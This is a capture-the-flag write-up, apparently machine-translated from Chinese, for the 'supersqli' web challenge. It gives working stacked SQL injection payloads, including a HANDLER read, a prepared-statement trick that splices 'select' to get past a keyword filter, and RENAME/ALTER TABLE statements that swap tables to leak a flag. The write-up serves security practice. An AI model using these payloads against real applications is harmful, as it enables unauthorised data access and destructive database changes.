Tips ： Method ten million , The best thing is to suit yourself ！

Tools

firefox

analysis

Look at the topic -- Note casually ,supersqli And the web content guess is sql Inject

1. Input 1, Found variable is inject

2. View page source code , Discovery tips sqlmap There is no soul , Realize that it should not be used sqlmap run , Try manual injection

3. Input

1' union select 1--+

Tips are filtered ,preg_match Can own Baidu , After filtering, it cannot be used select This command

4, Try Stack Injection

 Stacked injections( Stack Injection ) From the meaning of the noun, we can see that it should be a pile of sql sentence ( multiple ) Do it together . And it's the same in real use , We know that mysql in , Mainly in the command line , Add... At the end of each sentence ; End of statement . In this way, we think about whether we can use more than one sentence together . This is called stacked  injection.

command

1';show databases; --+

 5, Burst database , According to the title, it should be --supersqli, Query the table below to get two tables

6, Query the columns under the table

Be careful ：

1. Both orders should be followed by a semicolon

2. Column names should be enclosed in backquotes ,（ English model esc The next one ）

command

-1';show columns from `1919810931114514`;--+

  obtain flag This field , Out-of-service select, Try something else

Method 1 ： Use handler

command ：

handler `1919810931114514`  open         Open this file

; handler `1919810931114514` read first   According to the line read

-1'; handler `1919810931114514`  open ; handler `1919810931114514` read first; --+

obtain flag

View source code replication

Method 2 ：

precompile + Stack Injection

precompile :mysql Precompiled function of , It is for those frequently executed grammars to remain unchanged sql Statement , Every time sql The execution of statements must be compiled by the database , This process is quite time-consuming , One, two or more may not feel much , If there are thousands of them, the efficiency will obviously change .mysql The mechanism provided can make a structure unchanged sql Statements are pre compiled in the database , We just need to pass variable parameters to it for execution every time , In this way, the compilation steps are omitted , The efficiency improvement is very obvious . Deepen understanding link .

sentence ：

SET @tn = 'hahaha';  // Storage table name 
SET @sql = concat('select * from ', @tn);  // Storage SQL sentence 
PREPARE name from @sql;   // predefined SQL sentence 
EXECUTE name;  // Execute predefined SQL sentence 
(DEALLOCATE || DROP) PREPARE sqla;  // Delete predefined SQL sentence 

command ： There will be select Disassemble and splice , It can also be used. ascill Code instead of

;SET @sql=concat('s','elect', '* from `1919810931114514`'); PREPARE a from @sql; EXECUTE a;

when flag

Method 3 :

Use rename and alter These two commands are used to change the table name and field name . Because we can visit words Inside columns, Find out id, That is to say, what we input 1 The default is query words This watch . So we can put words Change the name of the watch into words1 surface , hold 1919810931114514 Change the name of the watch into words, Then take it. 1919810931114514 Inside flag Change the field name to id, Then input 1’ or 1=1# You can successfully get flag 了 .

Construct command ：

rename tables `words` to `words1`： Original words Change it to another name

rename tables `1919810931114514` to `words`： There will be flag The file is changed to words

alter table `words` change `flag` `id` varchar(100); Change its length

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

Successful execution

Inquire about flag

Related links ;

Attack and defend the world -supersqli topic _ Learn programming small w The blog of -CSDN Blog _ Attack and defend the world supersqli

Attack and defend the world -Web Master advanced area -supersqli( Random note of strong net cup )_bfengj The blog of -CSDN Blog

Stack Injection details （ Reprint ） - Good mentality (*▽*) - Blog Garden